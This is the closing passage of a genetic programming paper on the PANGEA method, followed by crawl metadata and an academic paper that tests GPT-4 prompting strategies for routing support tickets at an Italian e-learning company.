\cos, \tan\} to a function that is actually linear, then we expect the transcendental non-terminals to be dropped and the resulting best program to be a linear expression. However, the detection of linearity is merely implicit in GP - this activity is not explicitly directed by any features of the problem. GP may find out at some point of evolution that using a linear model is profitable, but does not ‘sanction, mandate or suggest’ it. The detection of linear relationships between features is of course a relatively trivial computational task, but the ability to explicitly recognize such patterns and inject the corresponding (sub)programs into the population can be viewed as a special case of a more general recognition-exploitation strategy [13]. 2. Consider a training set \( T \) over a function \( f(x, y) \), in which \( f(x, y) = f(y, x) \forall f \in T \). Even in the absence of prior domain knowledge, a human presented with sufficient samples from the raw training data for this task would in all probability notice that the function is symmetric. Algorithms for online induction of symmetries in the context of search and optimization is given in [11]. Such symmetry is of course a very specific case of (what is provisionally conjectured to be) an invariant of the function. Presented with such a regression task, a ‘pattern-sensitive’ human being would likely proceed to synthesize a function that respects this invariant. A partial synthesis might of course break the invariant, but activity is subject to the implicit understanding that ultimately restoring it is imperative. There are a number of ways in which one might attempt to incorporate the invariant into the subsequent search process, perhaps the most obvious of which is to add it as a soft constraint of the heuristic function. 8. CONCLUSIONS PANGEA imposes a gradient on the fitness function of a metaheuristic (in this case, Genetic Programming) via a metric (Minimum Description Length) obtained from patterns detected in the trajectory of program execution (trace). The success of this method was demonstrated on a range of integer and Boolean-valued problems. The method is conceptually straightforward and applicable to virtually any genre of GP. The computational overhead it imposes in comparison to conventional fitness assessment is reasonable, because trace acquisition is done on the fly during program execution (which has to be carried out in regular GP as well). The only substantial additional cost results from training the classifier, however simple symbolic classifiers like C4.5 learn quickly. It is increasingly being acknowledged that EC approaches are not a “one size fits all” approach. In particular, it is now understood that the initially popularized crossover and mutation operators do not enjoy the universality that were once ascribed to them. There is therefore in general a requirement in current EC practice for human ingenuity in the design and application of domain-specific operators, penalty functions etc. This work is an initial attempt to circumvent this requirement via the exploitation of regularity. In this case, regularity was determined by a statistical machine learning approach, i.e. the induction of a decision tree. In future work, we seek to extend the both the pattern detection methodology and the means by which it influences the subsequent search process. Acknowledgments K. Krawiec acknowledges financial support from grant no. 91507. J. Swan acknowledges support from grant EP/J017515/1. 9. REFERENCES
{"Source-Url": "http://www.cs.put.poznan.pl/kkrawiec/wiki/uploads/Research/2013GECCOPangea.pdf", "len_cl100k_base": 7913, "olmocr-version": "0.1.53", "pdf-total-pages": 8, "total-fallback-pages": 0, "total-input-tokens": 28534, "total-output-tokens": 9172, "length": "2e12", "weborganizer": {"__label__adult": 0.0004570484161376953, "__label__art_design": 0.0003840923309326172, "__label__crime_law": 0.0004935264587402344, "__label__education_jobs": 0.0008778572082519531, "__label__entertainment": 9.78708267211914e-05, "__label__fashion_beauty": 0.00021755695343017575, "__label__finance_business": 0.0002639293670654297, "__label__food_dining": 0.0004398822784423828, "__label__games": 0.0007791519165039062, "__label__hardware": 0.0012798309326171875, "__label__health": 0.0008373260498046875, "__label__history": 0.0003812313079833984, "__label__home_hobbies": 0.0001742839813232422, "__label__industrial": 0.0007271766662597656, "__label__literature": 0.0004394054412841797, "__label__politics": 0.0004105567932128906, "__label__religion": 0.0007319450378417969, "__label__science_tech": 0.09637451171875, "__label__social_life": 0.0001246929168701172, "__label__software": 0.00658416748046875, "__label__software_dev": 0.88623046875, "__label__sports_fitness": 0.0005125999450683594, "__label__transportation": 0.0009250640869140624, "__label__travel": 0.00023651123046875}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 40106, 0.03637]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 40106, 0.39461]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 40106, 0.91634]], "google_gemma-3-12b-it_contains_pii": [[0, 4419, false], [4419, 9646, null], [9646, 16729, null], [16729, 23093, null], [23093, 25626, null], [25626, 27783, null], [27783, 33914, null], [33914, 40106, null]], "google_gemma-3-12b-it_is_public_document": [[0, 4419, true], [4419, 9646, null], [9646, 16729, null], [16729, 23093, null], [23093, 25626, null], [25626, 27783, null], [27783, 33914, null], [33914, 40106, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 40106, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 40106, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 40106, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 40106, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 40106, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 40106, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 40106, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 40106, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 40106, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 40106, null]], "pdf_page_numbers": [[0, 4419, 1], [4419, 9646, 2], [9646, 16729, 3], [16729, 23093, 4], [23093, 25626, 5], [25626, 27783, 6], [27783, 33914, 7], [33914, 40106, 8]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 40106, 0.0]]}
olmocr_science_pdfs
2024-12-06
2024-12-06
50d2bcce15006ca1898140ac728cf8682cb05d08
LLM-based Approaches for Automatic Ticket Assignment: A Real-world Italian Application Nicola Arici\textsuperscript{1,2,*}, Luca Putelli\textsuperscript{1}, Alfonso E. Gerevini\textsuperscript{1}, Luca Sigalini\textsuperscript{2} and Ivan Serina\textsuperscript{1} \textsuperscript{1}Department of Information Engineering, University of Brescia, Via Branze 38, Brescia, Italy \textsuperscript{2}Mega Italia Media, Via Roncadelle 70A, Castel Mella, Italy Abstract IT service providers need to take care of errors, malfunctions, customizations and other issues every day. This is usually done through tickets: brief reports that describe a technical issue or a specific request sent by the users of the service. Tickets are often read by one or more human employees and then assigned to technicians or programmers in order to solve the raised issue. However, the increasing volume of such requests is leading the way to the automatization of this task. Since these tickets are written in natural language, in this paper we aim to exploit the new powerful pre-trained Large Language Model (LLM) GPT-4 and its knowledge in order to understand the problem described in the tickets and to assign them to the right employee. In particular, we focus our work on how to formulate the request to the LLM, which information is needed and the performance of different zero-shot learning, few-shot learning and ensemble learning approaches. Our study is based on a real-world ticket dataset provided by an Italian company which supplies IT solutions for creating and managing online courses. Keywords Automatic Ticket Assignment, Large Language Models, Prompt Engineering, Text Classification 1. Introduction Modern companies which supply IT solutions not only have to provide an effective software environment, but they also need to maintain it during the software lifecycle, to fix errors and malfunctions, to introduce new functionalities and satisfy the requests submitted by the users. This task is usually done by programmers specialized in maintenance tasks which need to take care of new issues every day. Such issues are usually submitted through ticketing systems. In these systems, the users can write a brief report that describes a problem they encountered, or a specific service they need. These reports, typically called tickets, are then distributed among the maintenance specialists which have to satisfy the users’ requests. However, in large companies which provide complex IT solutions or more than one product, different employees devoted to the maintenance can have different expertise. Therefore, there is the need to assign a ticket to the right person, i.e. an employee who has the necessary technical skills to solve the raised issue. In order to do that, typically one or more human employees have to read the ticket, understand the request and assign it to a technician. Since this task is quite time consuming, bigger companies are starting to implement automatic solutions. Although these solutions can be based on ad hoc algorithms [2, 3] or on fine-tuning generic pre-trained language models [4] such as BERT [5], they would require a considerable amount of training data and an expensive effort (by programmers and machine learning specialists) to implement such models. On the other hand, the outstanding results obtained by pre-trained large language models (LLMs) as few-shot learners (i.e. with a minimal number of training examples) [6, 7, 8] could make automatic ticket assignment available to many companies even without any particular effort. In order to verify whether that is achievable, in this work we investigate how these models can be applied to a real-world case scenario: the assignment of the tickets received by the Italian company Mega Italia Media1, which provides IT solutions in the e-learning sector for the occupational safety. In particular, in 2011 they released the DynDevice Learning Management System (LMS), facilitating companies in standard corporate training, allowing them to create specific courses, managing final exams [9, 10] (providing also the related certificates if the exam has been passed) and the interaction with the users [11]. The company receives many tickets related to this platform, which has to be maintained and updated constantly in order to satisfy the users’ needs. Using these tickets, we verify the performance of OpenAI GPT-4 [12], a state-of-the-art pre-trained LLM based on the Transformer architecture [13], for this task. However, it has been noted that the performance of such models can significantly vary depending on how the task requested is formulated or, in more technical terms, which prompt has been used [14, 15]. Therefore, we study different configurations and prompts into which more or less information is available to the LLM and in terms of how many examples we provide. We compare these results with a baseline into which a BERT model is fine-tuned on this task with 1000 labeled tickets. The rest of the paper is organized as follows. In Section 2, we provide the background and an overview of the state-of-the-art and the related works. In Section 3, we describe the dataset of our application. In Section 4, we describe our approaches for solving the automatic ticket assignment task, which are evaluated and discussed in Section 5. Finally, in Section 6 we propose some conclusions and future developments. The code and the datasets can be found on GitHub3. 2. Related work In recent years, several researchers have approached the support ticket domain, solving problems such as ticket categorization [2, 4, 16], ticket assignment and ticket resolution [17]; our work falls in the second category. In 2018, Uber, the famous private car transport company, proposed COTA [18] (Customer Obsession Ticket Assistant), a framework to take care of customer issues. They proposed two versions of their system: the first one combines several features, such as user information, trip information and ticket metadata, with a Random Forest algorithm for predicting the correct 1https://www.megaitaliamedia.com/en/ 3https://github.com/nicolarici/AI-TS operator of each ticket; the second version leverages a Encoder-Combiner-Decoder approach, based on CNN and RNNs over different types of features (such as categorical, numerical, binary and text features) and a multi-classification layer. A similar approach has been developed by DeLucia and Moore [19]; the authors implemented a Random Forest model fed with features created with latent Dirichlet allocation topic modeling, latent semantic analysis and Doc2Vec [20] starting from the ticket subject and message. Han and Sun [21] proposed in 2020 DeepRouting, an intelligent system for assigning tickets to operators in an expert network. It contains two modules: one for text matching, based on a convolutional neural network trained over tri-grams derived by the ticket description, and one for graph matching, based on a Graph Convolutional Network fed with the experts graph. With Feng et al. [22], in 2021 Apple developed its personal ticket assignment system, TaDaa (Ticket Assignment Deep learning Auto Advisor). This system is based on the state-of-the-art Transformer architecture, in particular a pretrained BERT model fine-tuned to solve two classification tasks. The model has two different classifiers: the first one to assign the ticket to one of the 3000 groups, and the second one to identify the expert (that belongs to that group) that is going to solve the issue. We used a similar idea, in our much simpler context, with the BERT baseline described in Section 5. However, in this paper we show how also with a limited number of examples, pre-trained LLMs can achieve similar performance. Differently from these works, which are based on custom algorithms and models (which require a considerable effort for designing, implementing and testing), in our work we verify whether pre-trained LLMs can be used for this kind of task, even without fine-tuning. More generally, we exploit prompt engineering, which was designed precisely for obtaining the best results from these pre-trained models. Regarding this line of work, White et al. [23] provide a pattern catalog to solve common problems when conversing with a LLM. They propose 17 patterns which allow the users to better handle the input to give to the model, the output structure and format, possible errors in content, i.e. invented answers based on unverified facts, the prompt and how it can be improved to receive better responses and the interaction between the user and the model and the context needed by the model to generate a better response. Moreover, Reynolds at el. [24] showed that zero shot learning (i.e. without any example provided to the model) with a good prompt can outperform a standard few shots approach (i.e. with some examples); to do so they introduced the concept of meta-prompt, that seeds the model to generate its own natural language prompt to solve the task. A similar result has been achieved by Zhou et al. [25], where the authors propose Automatic Prompt Engineer, a framework for automatic instruction generation and selection. In their method the authors optimized the prompt by searching over a pool of instruction candidates proposed by an LLM in order to maximize a chosen score function. The LLMs, in particular ChatGPT, have been proven very effective in solving specific NLP tasks on general domains. Even in specific domains, such as public health [26, 27, 28], environmental problems [29] or legal rulings and laws [30, 31], the LLMs achieve acceptable performance. To the best of our knowledge, there are currently no applications of GPT-based models in the context of workplace security. 3. Available data Since the release of DynDevice in 2011, Mega Italia Media started facing the problem of assisting and supporting end users. Originally, this service was provided by phone calls or emails but, with the strong spread of the platform over the years, these channels were soon saturated. To help the company operators to solve the users problem, in 2013 the company developed a ticketing system; this new feature allowed the company to keep track of all the tickets opened, memorizing the status of the user’s request and who was in charge to solve the problem. Moreover, this system kept record of all the conversations between users and operators. Overall, the company has received more than 10000 tickets in the last 10 years. However, in the last period several new features and services (such as multiple interface changes, a videocall system and several AI applications) were introduced, and therefore we decided to consider in our dataset only the tickets received in the last months, which are about 1300. Furthermore, to build our dataset we decided only to keep the significant information: the ticket category, object and description and the area who solved the ticket; other information such as dates and identifiers has been removed. In the following we provide an example of a ticket; please note that this example has been translated, since all our tickets are written in Italian. Example 1. CATEGORY: G. More on e-Learning/training solutions SUBJECT: Certificate with exam in presence HTML5 DESCRIPTION: “Certificate with Examination in Attendance” I turned it into HTML 5. Everything is fine except for the column rows that do not appear. What could be the problem? Thank you AREA: SW ![Cross table between ticket categories and macro areas who are in charge of solving the ticket.](image-url) **Figure 1:** Cross table between ticket categories and macro areas who are in charge of solving the ticket. The category field contains one of the 11 predetermined categories decided by the company. A complete categories list is reported in Figure 1. The object and the description are text fields that require a slight pre-process in order to remove the HTML tags, the URLs and other special characters that can harm the classification process. Each ticket is assigned to a specific operator who is in charge of solving the raised issue. However, all the operators can be aggregated in three main macro areas: - **eLEARNING**: which handles the problems on the courses provided to the end users; - **TECH**: which solves the technical issues about the platform; - **SW**: that removes bugs and other software issues. Each area manager assigns the ticket to a single operator suited to handle the case. In the left part of the Figure 2, we reported the ticket distribution among the macro areas; as we can see the three classes are approximately equally distributed. On the contrary, as shown in the right part of Figure 2, the categories follow an unbalanced distribution, with category G being the most frequent, with more than 300 tickets compared to the least frequent. Another statistic that we extrapolate from the dataset is the cross tabulation between the categories and the area fields. As we can see in Figure 1, there is a strong correlation between some categories and some areas: the category A has a strong correlation with the eLEARNING area (and vice-versa), whereas both TECH and SW have a strong correlation with the category G. We expect tickets in these categories to be best assigned with a well constructed prompt containing this information. Other categories do not present any correlation, in some cases due to the low number of tickets, such as categories N and H. In other cases (such as categories F and E) the tickets are equally distributed between all the areas. Finally, we decided to sample with stratification, following the area distribution, approximately 250 tickets to build 5 different test sets; this way, each test set contains 18 tickets for eLEARNING, 15 tickets for TECH and 14 tickets for SW. The tickets sampled with this strategy retain also the categories distribution and the cross correlation discussed above. ![Figure 2](image-url) **Figure 2**: On the left, an histogram showing ticket distribution by the macro areas (i.e. our classification labels). On the right, an histogram showing the ticket distribution for each category considered. 4. Prompts and methods for automatic ticket assignment The base task to solve for the automatic ticket assignment is a multi-class classification, into which we have to choose which group (eLEARNING, TECH or SW) will receive the ticket. To solve this task, we decided to exploit the Python version of the OpenAI Chat Completion API\(^4\), which allows interaction with pre-trained LLMs. For each call, the API requires several parameters. The most relevant ones for our work are: the *model* we want to query, which in our case can be GPT-4 or GPT-3.5-turbo, and the *temperature*, a decimal number between 0.0 and 2.0 (default 1.0), which controls randomness (higher values) or determinism (lower values) in the response generated. To have as much determinism as possible, in all trials we set temperature to 0.0. The corpus of the API request is composed by two messages: the *system prompt*, that contains the description of the task and the information to solve it, and the *user prompt*, i.e. the ticket to classify. We tested GPT in three ways: zero shot learning, few shots learning, and ensemble learning. For the **zero shot learning** scenario, we provided to the model insightful information in the system prompt and no examples; all the information was extracted from the database described in Section 3. These are the zero shot prompts we implemented: - **Baseline**: it describes the task, provides the basic information and imposes to GPT to answer only with the macro area name. From here on, each subsequent prompt is to be considered concatenated with this one. Example: You are the manager of a service center whose task is to divide tickets between the various human operators. The available operators, contained in square brackets are as follows: [eLEARNING, TECH, SW]. The tickets are divided into categories, listed by letters of the alphabet, contained in round brackets, which are as follows: (A. Problems in using a course, B. ...). Each ticket consists of a subject and a description. Your task is to assign the ticket to the most suitable operator, answering only with the operator’s name. - **Human**: it contains insightful information, provided by a human employee, on the role of the three areas and the problems solved. Example: SW handles technical problems with software code, new customisation and developments and ICT (Information and Communication Technologies) and SEO (Search Engine Optimisation) issues. The same information is provided for the other 2 areas. - **Categories**: it contains information related to the assignment of the tickets aggregated by category. For each category, we extract the percentage of tickets solved by each area belonging to that category (which can be seen in Figure 1). For instance, for the category A we wrote: Example: 66% of the tickets in the category “A. Problems in using a course” are assigned to eLEARNING, 24% to TECH and 11% to SW. The same information is provided for the other 10 categories. - **Areas**: it contains information about the assignment of tickets aggregated by areas. From the Figure 1, for each area, we extract the percentage of tickets belonging to each category. \(^4\)https://platform.openai.com/docs/api-reference/chat solved by the area. For instance, for the area eLEARNING we have: Example: To eLEARNING is assigned 38% of the tickets in category A, 8% in B, 9% in C, 3% in D, 17% in E, 8% in F, 8% in G, 1% in H, 0% in I, 7% in M and 2% in N. The same information is provided for the other 2 areas. - **Summaries**: for this prompt we asked GPT-4 to summarize the issues raised by the users in 10 tickets for each area; these tickets were randomly sampled from the training dataset. For instance, for the area eLEARNING we have the following result: Example: eLEARNING solves problems related to the activation of courses, changes of certificates, platform access problems, cancellation of courses, issuing of certificates, downloading of certificates and approval of enrolment forms. The same summary is generated by GPT-4 for the other two areas and used by GPT in the system prompt. Please note that these summaries are generated separately by the model. At the moment of the ticket assignment, the LLM receives the summary without any knowledge of the 10 examples used for generating it. As a second approach we implemented the **few shots learning**. The basic idea is to give to the model some examples of classification so it can understand the pattern, generalize it and then apply what it has learned to test instances. This approach has achieved outstanding results in a lot of NLP tasks [6, 8]. All our few shots approaches use the Baseline Prompt, without additional information. Instead, we provided to the model some examples in the same format expressed in the Example 1, with the correct macro area assigned. The last approach, the **ensemble learning**, leverages the best results obtained in the past trials to try to use all the information at our disposal. Thus, for each ticket, we made \( n \) calls to the OpenAI API with different prompts, keeping model and temperature unchanged. Each result is counted as a vote, with no specific weight assigned, and the area with the most votes has the ticket assigned. In the event of a tie, the ticket is randomly assigned to one of the areas with the most votes. In our experimental evaluation we use an ensemble made by **three** and **four** prompts. 5. **Experimental results** In this section, we report the results of our experiments. For each trial, in Table 1 we report the mean and the standard deviation over the five test sets for two metrics: the accuracy and the macro F1 score, both expressed between 0.0, the worst, and 1.0, the best. In addition to the approaches described in the previous section, to provide a baseline for comparison with state-of-the-art approaches, we tested how a classical approach with BERT solves the task. Starting from a pre-trained Italian version of BERT available on HuggingFace\(^5\), we fine-tuned the model on this specific task on 907 samples for 20 epochs and we took the best performing model on a validation set made by 101 examples. To perform the classification, we add to BERT a simple feedforward layer with three neurons preceded by a 0.1 dropout layer. In training we used the Binary Cross Entropy loss function, the AdamW optimizer, with learning rate set to \( 2 \times 10^{-5} \); we set decay to 0.01 and batch size to 32. We fed this classification model with \(^5\)dbmdz/bert-base-italian-uncased <table> <thead> <tr> <th>Approach</th> <th>Prompt</th> <th>Accuracy</th> <th>Macro F1</th> </tr> </thead> <tbody> <tr> <td>ZS</td> <td>Baseline</td> <td>0.34 ± 0.05</td> <td>0.29 ± 0.05</td> </tr> <tr> <td>ZS</td> <td>Summaries</td> <td>0.50 ± 0.07</td> <td>0.48 ± 0.06</td> </tr> <tr> <td>ZS</td> <td>Categories</td> <td>0.53 ± 0.06</td> <td>0.49 ± 0.09</td> </tr> <tr> <td>ZS</td> <td>All Information</td> <td>0.54 ± 0.05</td> <td>0.49 ± 0.07</td> </tr> <tr> <td>ZS</td> <td>Areas</td> <td>0.56 ± 0.03</td> <td>0.50 ± 0.04</td> </tr> <tr> <td>ZS</td> <td>Human</td> <td>0.57 ± 0.03</td> <td>0.54 ± 0.04</td> </tr> <tr> <td>FS</td> <td>One Example</td> <td>0.19 ± 0.05</td> <td>0.14 ± 0.05</td> </tr> <tr> <td>FS</td> <td>Three Examples</td> <td>0.44 ± 0.02</td> <td>0.36 ± 0.04</td> </tr> <tr> <td>FS</td> <td>Five Examples</td> <td>0.44 ± 0.05</td> <td>0.34 ± 0.05</td> </tr> <tr> <td>FS</td> <td>Ten Examples</td> <td>0.56 ± 0.04</td> <td>0.51 ± 0.04</td> </tr> <tr> <td>BERT</td> <td>Only Ticket</td> <td>0.62 ± 0.07</td> <td>0.62 ± 0.07</td> </tr> <tr> <td>BERT</td> <td>Full</td> <td>0.65 ± 0.07</td> <td>0.65 ± 0.07</td> </tr> <tr> <td>EL</td> <td>Three Prompts</td> <td>0.57 ± 0.05</td> <td>0.52 ± 0.06</td> </tr> <tr> <td>EL</td> <td>Four Prompts</td> <td>0.61 ± 0.05</td> <td>0.55 ± 0.08</td> </tr> </tbody> </table> Table 1 Experimental results of our methods. In the Approach column, we specify if we use a zero-shot approach (ZS), a few-shot (FS) a fine-tuned BERT (BERT) or an ensemble learning approach (EL). In the Prompt column, we specify the additional configuration of the approach (as described in Section 4). For both Accuracy and Macro F1 we report their mean ± their standard deviation calculated over five different test sets. As regarding the zero shot approach, when we start adding information to the base prompt, the accuracy improves. The two trials that leverage the correlation between the area and the category reach accuracy 0.53 for the Categories Prompt and 0.56 for the Areas Prompt. The reason for this behavior could be due to the length of the prompts: the first prompt is, more or less, 200 tokens long and some information is forgotten or ignored by the LLM. Also, in these two cases we provided only information about the categories and no information about the ticket description. This information is contained in the other two prompts: the Human and Summaries prompts. For the first case, the model reaches about 0.57 accuracy and an higher macro F1 score (0.54) and with the lowest standard deviation. For the second prompt, the accuracy drops to 0.50 with an higher standard deviation (0.07), probably due to the fact that the summaries are obtained with 10 tickets only, and the accuracy changes depending on whether the tickets in the dataset are more or less similar than those used for the summaries. When we pass all the information to the model the performance is lower (0.54 accuracy), probably because the prompt reaches a critical length. For the few shots approaches, the results are not particularly good. The single example case manages to perform even worse with respect to the baseline, with an accuracy of approximately 0.19. However, as it can be seen from the Table 1, increasing the number of examples improves the accuracy; with 3 and 5 examples, we reach 0.44 accuracy. This is probably due to the fact that the tickets are very varied and a small part of them does not represent the totality of issues addressed by a macro area. Only with 10 examples we get 0.56 (with a standard deviation of 0.04), approximately the same results obtained by the zero shot approaches. The only approach that almost reaches the BERT baseline is the ensemble learning. In this case, using the best single information zero shot trials, combined with a voting system, helps the performances to get 0.57 with three prompts (Human, Areas and Categories) and 0.61 with all four prompts; in these cases the standard deviation is lower w.r.t. the BERT baseline. Also, in these scenarios, we can use all the information described in the zero shot approach without increasing the prompt length, unlike the full zero-shot case. Probably, with different tie breaking strategies (perhaps based on prediction probabilities) even better performances can be achieved; unfortunately, at the moment the Chat Competition OpenAI API does not provide any probabilistic information. The second experiment focused on comparing the performance of the two main GPT models made available by OpenAI: GPT-4, and its predecessor GPT-3.5. Although this can be interesting from the researcher’s perspective, this comparison has also an economic motivation. In fact, according to the API pricing, invoking GPT-3.5 costs more than 20 times less than GPT-4. In this experiment, we keep the same prompts and the other hyperparameters, modifying just the model. As we can see in Figure 3, the difference in performance is noticeable. The best result obtained by GPT-3.5 is with the Categories Prompt, with an accuracy of 0.50, less than 5 points lower than GPT-4; the Human prompt loses approximately 10 points, while the Summaries prompt drops 15 points. The worst results is obtained by the Areas prompt, with an accuracy of 0.37 and a drop of 20 points. This behaviour is probably due to the long list of percentages for each single areas and which can confuse the model. No difference was found in the standard deviations. An average loss of 6 accuracy points between the 3 best performing prompts (thus excluding Areas) could still justify the cost of using GPT-4 over its older but cheaper counterpart. 6. Conclusions and Future work In this work, we have shown an application of pre-trained Large Language Models for the automatic ticket assignment, based on the real-world data provided by Mega Italia Media, a company that provides IT solutions in the e-learning context. In particular, we analyzed how different prompts, with more or less information and examples, influence the performance on this task. The experimental evaluation shows that in our context the classical few-shots approach does not provide a considerable improvement. This is probably because a limited number of examples can’t capture the overall variety of tickets that the company receives. Instead, a zero-shot approach definitely improves the performance since it considers more information related to the overall context of the application (for instance a human description of the different classes or the percentage of instances belonging to each category). The best results are obtained by the ensemble methods involving three and four prompts. Their results almost reach the ones obtained by a BERT model specifically fine-tuned for this task. In contrast to BERT, which uses more than 1000 tickets between training and validation, this approach uses none. This approach can certainly be more efficient in scenarios where there is a little amount of data available. As future work, we aim to study other prompting techniques, such as the chain-of-thought prompting [32] or prompts automatically generated [15]. Moreover, we would like to explore the performance of other LLMs, especially testing the open source ones, such as OpenAssistant, Dolly, GPT-J or GPT-NeoX. This could lead to a more detailed study, not only in terms of measuring the performance of each model, but also trying to understand what the models know in this field (which involves information technology, programming languages, e-learning, etc.) how this knowledge is stored in such models [33, 34], and focus on their explainability, analysing the behaviour of the attention mechanisms [35, 36] and prevent unwanted or discriminatory behaviour [37]. References [1] E. Bassignana, D. Brunato, M. Polignano, A. Ramponi, Preface to the Seventh Workshop on Natural Language for Artificial Intelligence (NL4AI), in: Proceedings of the Seventh Workshop on Natural Language for Artificial Intelligence (NL4AI 2023) co-located with 22th International Conference of the Italian Association for Artificial Intelligence (AI*IA 2023), 2023. [28] T. Mehmood, A. E. Gerevini, A. Lavelli, I. Serina, Combining multi-task learning with transfer learning for biomedical named entity recognition, in: M. Cristani, C. Toro, C. Zanni- Merk, R. J. Howlett, L. C. Jain (Eds.), Knowledge-Based and Intelligent Information & Engineering Systems: Proceedings of the 24th International Conference KES-2020, Virtual 09.080. [29] J.-J. Zhu, J. Jiang, M. Yang, Z. J. Ren, Chatgpt and environmental research, Environmental [31] I. Chalkidis, M. Fergadiotis, P. Malakasiotis, N. Aletras, I. Androutsopoulos, LEGAL-BERT: the muppets straight out of law school, CoRR abs/2010.02559 (2020). [33] L. Serina, L. Putelli, A. E. Gerevini, I. Serina, Synonyms, antonyms and factual knowledge in BERT heads, Future Internet 15 (2023) 230. [34] D. Dai, L. Dong, Y. Hao, Z. Sui, B. Chang, F. Wei, Knowledge neurons in pretrained transformers, in: Proceedings of the 60th Annual Meeting of the Association for Computa- tional Linguistics (Volume 1: Long Papers), ACL 2022, Dublin, Ireland, May 22-27, 2022, Association for Computational Linguistics, 2022, pp. 8493–8502. on the extraction of drug-drug interactions, in: CLiC-it, volume 2481 of CEUR Workshop attention for the classification of medical reports, in: XALit@AI*IA, volume 3277 of CEUR in BERT with a weakly supervised approach, in: D. Nozza, L. C. Passaro, M. Polignano (Eds.), Proceedings of the Sixth Workshop on Natural Language for Artificial Intelligence (NL4AI 2022) co-located with 21th International Conference of the Italian Association for Artificial Intelligence (AI*IA 2022), Udine, November 30th, 2022, volume 3287 of CEUR Workshop pdf.
{"Source-Url": "https://ceur-ws.org/Vol-3551/paper4.pdf", "len_cl100k_base": 6996, "olmocr-version": "0.1.50", "pdf-total-pages": 13, "total-fallback-pages": 0, "total-input-tokens": 31488, "total-output-tokens": 10561, "length": "2e12", "weborganizer": {"__label__adult": 0.0005321502685546875, "__label__art_design": 0.00109100341796875, "__label__crime_law": 0.0006742477416992188, "__label__education_jobs": 0.048065185546875, "__label__entertainment": 0.0004458427429199219, "__label__fashion_beauty": 0.00043392181396484375, "__label__finance_business": 0.00106048583984375, "__label__food_dining": 0.00061798095703125, "__label__games": 0.0012969970703125, "__label__hardware": 0.0012903213500976562, "__label__health": 0.0013294219970703125, "__label__history": 0.000644683837890625, "__label__home_hobbies": 0.00022840499877929688, "__label__industrial": 0.0009222030639648438, "__label__literature": 0.0021495819091796875, "__label__politics": 0.0006260871887207031, "__label__religion": 0.0007944107055664062, "__label__science_tech": 0.3818359375, "__label__social_life": 0.0004398822784423828, "__label__software": 0.053955078125, "__label__software_dev": 0.5, "__label__sports_fitness": 0.00037026405334472656, "__label__transportation": 0.0007872581481933594, "__label__travel": 0.0003333091735839844}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 38166, 0.06462]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 38166, 0.17244]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 38166, 0.88158]], "google_gemma-3-12b-it_contains_pii": [[0, 2757, false], [2757, 6191, null], [6191, 9807, null], [9807, 11746, null], [11746, 14237, null], [14237, 17491, null], [17491, 20812, null], [20812, 23318, null], [23318, 25150, null], [25150, 28469, null], [28469, 31950, null], [31950, 35583, null], [35583, 38166, null]], "google_gemma-3-12b-it_is_public_document": [[0, 2757, true], [2757, 6191, null], [6191, 9807, null], [9807, 11746, null], [11746, 14237, null], [14237, 17491, null], [17491, 20812, null], [20812, 23318, null], [23318, 25150, null], [25150, 28469, null], [28469, 31950, null], [31950, 35583, null], [35583, 38166, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 38166, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 38166, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 38166, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 38166, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 38166, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 38166, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 38166, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 38166, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 38166, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 38166, null]], "pdf_page_numbers": [[0, 2757, 1], [2757, 6191, 2], [6191, 9807, 3], [9807, 11746, 4], [11746, 14237, 5], [14237, 17491, 6], [17491, 20812, 7], [20812, 23318, 8], [23318, 25150, 9], [25150, 28469, 10], [28469, 31950, 11], [31950, 35583, 12], [35583, 38166, 13]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 38166, 0.09756]]}
olmocr_science_pdfs
2024-12-02
2024-12-02
d6bf50e188880aedf0cb4d914ff86a566f79322b
